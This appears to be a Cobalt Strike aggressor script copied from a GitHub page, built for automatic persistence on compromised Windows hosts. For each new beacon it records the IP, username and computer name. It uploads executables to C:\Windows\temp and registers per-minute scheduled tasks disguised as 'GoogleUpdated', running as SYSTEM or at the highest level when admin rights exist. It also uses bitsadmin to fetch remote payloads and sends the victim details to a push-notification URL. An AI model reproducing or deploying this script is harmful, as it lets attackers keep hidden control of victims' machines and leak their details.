-
Notifications
You must be signed in to change notification settings - Fork 4
/
Automatic-permission-maintenance(schtasks).cna
57 lines (50 loc) · 2.74 KB
/
Automatic-permission-maintenance(schtasks).cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Author: H0e4a0r1t
# 循环获取所有beacon
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "\r\n";
}
println($output);
}
#获取ip、计算机名、登录账号
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
println('IP:'.$internalIP.' UserName:'.$userName.' ComputerName:'.$computerName)
if (!-isadmin $1){
println("非管理员权限");
#本地上传
bcd($1, "c:\\Windows\\temp\\");
bupload($1, script_resource("/script/javaEE.exe"));
#bitadmin远程下载
#bshell($1, 'bitsadmin /transfer GoogleUpdated /download /priority normal "这里填写你的exe地址" "c:\\Windows\\temp\\javaEE.exe"');
#隐藏可执行文件
#bshell($1, "attrib.exe +h c:\\Windows\\temp\\javaEE.exe");
bshell($1, "schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /tr c:\\Windows\\temp\\javaEE.exe");
} else {
println("管理员权限");
#本地上传
bcd($1, "c:\\Windows\\temp\\");
bupload($1, script_resource("/script/javaEE.exe"));
#bitadmin远程下载
#bshell($1, 'bitsadmin /transfer GoogleUpdated /download /priority normal "这里填写你的exe地址" "c:\\Windows\\temp\\javaEE.exe"');
#bshell($1, "attrib.exe +h c:\\Windows\\temp\\javaEE.exe");
bshell($1, "schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\\Windows\\temp\\javaEE.exe");
#本地上传
bcd($1, "c:\\Windows\\temp\\");
bupload($1, script_resource("/script/javaC.exe"));
#bitadmin远程下载
bshell($1, 'bitsadmin /transfer GoogleUpdated /download /priority normal "这里填写你的exe地址" "c:\\Windows\\temp\\javaC.exe"');
#bshell($1, "attrib.exe +h c:\\Windows\\temp\\javaC.exe");
bshell($1, "schtasks /create /sc minute /mo 1 /tn 'GoogleUpdateb' /RU SYSTEM /tr c:\\Windows\\temp\\javaC.exe");
}
#get一下Server酱的链接
#$url = 'https://sctapi.ftqq.com/XXXXXXXXXXXX(key).send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0AIP:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
http_get($url);
}